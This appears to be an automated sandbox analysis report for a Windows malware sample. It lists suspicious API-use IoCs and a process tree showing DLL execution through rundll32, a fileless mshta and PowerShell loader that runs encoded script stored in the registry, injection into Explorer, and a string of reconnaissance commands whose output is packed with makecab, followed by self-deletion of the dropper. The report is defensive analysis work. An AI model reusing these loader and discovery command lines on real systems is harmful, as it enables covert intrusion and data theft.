3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 2152 powershell.exe 3000 Explorer.EXE 3000 Explorer.EXE 3000 Explorer.EXE 2136 cmd.exe 3000 Explorer.EXE 3000 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 32 IoCs
description pid Process Token: SeDebugPrivilege 2152 powershell.exe Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeDebugPrivilege 1412 tasklist.exe Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE Token: SeShutdownPrivilege 3000 Explorer.EXE Token: SeCreatePagefilePrivilege 3000 Explorer.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3792 iexplore.exe 3792 iexplore.exe 3792 iexplore.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 3792 iexplore.exe 3792 iexplore.exe 3716 IEXPLORE.EXE 3716 IEXPLORE.EXE 3792 iexplore.exe 3792 iexplore.exe 1852 IEXPLORE.EXE 1852 IEXPLORE.EXE 3792 iexplore.exe 3792 iexplore.exe 3716 IEXPLORE.EXE 3716 IEXPLORE.EXE 3000 Explorer.EXE -
Suspicious use of WriteProcessMemory 104 IoCs
description pid Process procid_target PID 4008 wrote to memory of 3876 4008 rundll32.exe 68 PID 4008 wrote to memory of 3876 4008 rundll32.exe 68 PID 4008 wrote to memory of 3876 4008 rundll32.exe 68 PID 3792 wrote to memory of 3716 3792 iexplore.exe 80 PID 3792 wrote to memory of 3716 3792 iexplore.exe 80 PID 3792 wrote to memory of 3716 3792 iexplore.exe 80 PID 3792 wrote to memory of 1852 3792 iexplore.exe 81 PID 3792 wrote to memory of 1852 3792 iexplore.exe 81 PID 3792 wrote to memory of 1852 3792 iexplore.exe 81 PID 2116 wrote to memory of 2152 2116 mshta.exe 84 PID 2116 wrote to memory of 2152 2116 mshta.exe 84 PID 2152 wrote to memory of 888 2152 powershell.exe 86 PID 2152 wrote to memory of 888 2152 powershell.exe 86 PID 888 wrote to memory of 1572 888 csc.exe 87 PID 888 wrote to memory of 1572 888 csc.exe 87 PID 2152 wrote to memory of 1948 2152 powershell.exe 88 PID 2152 wrote to memory of 1948 2152 powershell.exe 88 PID 1948 wrote to memory of 2144 1948 csc.exe 89 PID 1948 wrote to memory of 2144 1948 csc.exe 89 PID 2152 wrote to memory of 3000 2152 powershell.exe 56 PID 2152 wrote to memory of 3000 2152 powershell.exe 56 PID 2152 wrote to memory of 3000 2152 powershell.exe 56 PID 2152 wrote to memory of 3000 2152 powershell.exe 56 PID 3000 wrote to memory of 3516 3000 Explorer.EXE 59 PID 3000 wrote to memory of 3516 3000 Explorer.EXE 59 PID 3000 wrote to memory of 2136 3000 Explorer.EXE 90 PID 3000 wrote to memory of 2136 3000 Explorer.EXE 90 PID 3000 wrote to memory of 2136 3000 Explorer.EXE 90 PID 3000 wrote to memory of 3516 3000 Explorer.EXE 59 PID 3000 wrote to memory of 3516 3000 Explorer.EXE 59 PID 3000 wrote to memory of 3792 3000 Explorer.EXE 79 PID 3000 wrote to memory of 3792 3000 Explorer.EXE 79 PID 3000 wrote to memory of 3792 3000 Explorer.EXE 79 PID 3000 wrote to memory of 3792 3000 Explorer.EXE 79 PID 3000 wrote to memory of 2136 3000 Explorer.EXE 90 PID 3000 wrote to memory of 2136 3000 Explorer.EXE 90 PID 2136 wrote to memory of 2636 2136 cmd.exe 92 PID 2136 wrote to memory of 2636 2136 cmd.exe 92 PID 2136 wrote to memory of 2636 2136 cmd.exe 92 PID 2136 wrote to memory of 2636 2136 cmd.exe 92 PID 2136 wrote to memory of 2636 2136 cmd.exe 92 PID 3000 wrote to memory of 480 3000 Explorer.EXE 93 PID 3000 wrote to memory of 480 3000 Explorer.EXE 93 PID 3000 wrote to memory of 1740 3000 Explorer.EXE 94 PID 3000 wrote to memory of 1740 3000 Explorer.EXE 94 PID 1740 wrote to memory of 2280 1740 cmd.exe 97 PID 1740 wrote to memory of 2280 1740 cmd.exe 97 PID 480 wrote to memory of 3916 480 cmd.exe 98 PID 480 wrote to memory of 3916 480 cmd.exe 98 PID 3000 wrote to memory of 2024 3000 Explorer.EXE 99 PID 3000 wrote to memory of 2024 3000 Explorer.EXE 99 PID 3000 wrote to memory of 1412 3000 Explorer.EXE 101 PID 3000 wrote to memory of 1412 3000 Explorer.EXE 101 PID 3000 wrote to memory of 1316 3000 Explorer.EXE 103 PID 3000 wrote to memory of 1316 3000 Explorer.EXE 103 PID 3000 wrote to memory of 736 3000 Explorer.EXE 104 PID 3000 wrote to memory of 736 3000 Explorer.EXE 104 PID 3000 wrote to memory of 736 3000 Explorer.EXE 104 PID 3000 wrote to memory of 736 3000 Explorer.EXE 104 PID 3000 wrote to memory of 736 3000 Explorer.EXE 104 PID 1316 wrote to memory of 1572 1316 cmd.exe 106 PID 1316 wrote to memory of 1572 1316 cmd.exe 106 PID 3000 wrote to memory of 1352 3000 Explorer.EXE 107 PID 3000 wrote to memory of 1352 3000 Explorer.EXE 107 PID 3000 wrote to memory of 1352 3000 Explorer.EXE 107 PID 3000 wrote to memory of 1352 3000 Explorer.EXE 107 PID 3000 wrote to memory of 1352 3000 Explorer.EXE 107 PID 3000 wrote to memory of 1352 3000 Explorer.EXE 107 PID 3000 wrote to memory of 396 3000 Explorer.EXE 110 PID 3000 wrote to memory of 396 3000 Explorer.EXE 110 PID 3000 wrote to memory of 2632 3000 Explorer.EXE 112 PID 3000 wrote to memory of 2632 3000 Explorer.EXE 112 PID 2632 wrote to memory of 1500 2632 cmd.exe 114 PID 2632 wrote to memory of 1500 2632 cmd.exe 114 PID 3000 wrote to memory of 3888 3000 Explorer.EXE 115 PID 3000 wrote to memory of 3888 3000 Explorer.EXE 115 PID 3000 wrote to memory of 2568 3000 Explorer.EXE 117 PID 3000 wrote to memory of 2568 3000 Explorer.EXE 117 PID 2568 wrote to memory of 636 2568 cmd.exe 119 PID 2568 wrote to memory of 636 2568 cmd.exe 119 PID 3000 wrote to memory of 3396 3000 Explorer.EXE 120 PID 3000 wrote to memory of 3396 3000 Explorer.EXE 120 PID 3000 wrote to memory of 3780 3000 Explorer.EXE 122 PID 3000 wrote to memory of 3780 3000 Explorer.EXE 122 PID 3780 wrote to memory of 1412 3780 cmd.exe 124 PID 3780 wrote to memory of 1412 3780 cmd.exe 124 PID 3000 wrote to memory of 2564 3000 Explorer.EXE 125 PID 3000 wrote to memory of 2564 3000 Explorer.EXE 125 PID 3000 wrote to memory of 2056 3000 Explorer.EXE 127 PID 3000 wrote to memory of 2056 3000 Explorer.EXE 127 PID 2056 wrote to memory of 3916 2056 cmd.exe 129 PID 2056 wrote to memory of 3916 2056 cmd.exe 129 PID 3000 wrote to memory of 2632 3000 Explorer.EXE 130 PID 3000 wrote to memory of 2632 3000 Explorer.EXE 130 PID 3000 wrote to memory of 1028 3000 Explorer.EXE 132 PID 3000 wrote to memory of 1028 3000 Explorer.EXE 132 PID 1028 wrote to memory of 2568 1028 cmd.exe 134 PID 1028 wrote to memory of 2568 1028 cmd.exe 134 PID 3000 wrote to memory of 2000 3000 Explorer.EXE 135 PID 3000 wrote to memory of 2000 3000 Explorer.EXE 135 PID 3000 wrote to memory of 2624 3000 Explorer.EXE 137 PID 3000 wrote to memory of 2624 3000 Explorer.EXE 137 PID 3000 wrote to memory of 1412 3000 Explorer.EXE 139 PID 3000 wrote to memory of 1412 3000 Explorer.EXE 139
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\u271020tar.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\u271020tar.dll,#13⤵
- Suspicious behavior: EnumeratesProcesses
PID:3876
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\0F48D51C-2296-191F-A4B3-765D18970AE1\\\Audients'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\0F48D51C-2296-191F-A4B3-765D18970AE1").AdmTdeui))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtnrgd4y\qtnrgd4y.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39FC.tmp" "c:\Users\Admin\AppData\Local\Temp\qtnrgd4y\CSC73648D81FE4048F79E82FBFAE66238.TMP"5⤵PID:1572
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uoxlzjkv\uoxlzjkv.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3AC8.tmp" "c:\Users\Admin\AppData\Local\Temp\uoxlzjkv\CSCB4C8A1FD9F904BA6B3527E5BA83C2E8E.TMP"5⤵PID:2144
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\u271020tar.dll"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2636
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\A4AE.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:3916
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\13B4.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:2280
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\13B4.bi1"2⤵PID:2024
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A4AE.bi1"2⤵PID:1412
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:1572
-
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:736
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1352
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:396
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:2632
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:1500
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:3888
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:2568
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:636
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:3396
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:3780
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:2564
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:2056
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:3916
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:2632
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:1028
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:2568
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:2000
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\A3D5.bin1 > C:\Users\Admin\AppData\Local\Temp\A3D5.bin & del C:\Users\Admin\AppData\Local\Temp\A3D5.bin1"2⤵PID:2624
-
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\92AE.bin"2⤵PID:1412
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3516
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3792 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3716
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3792 CREDAT:82951 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1852
-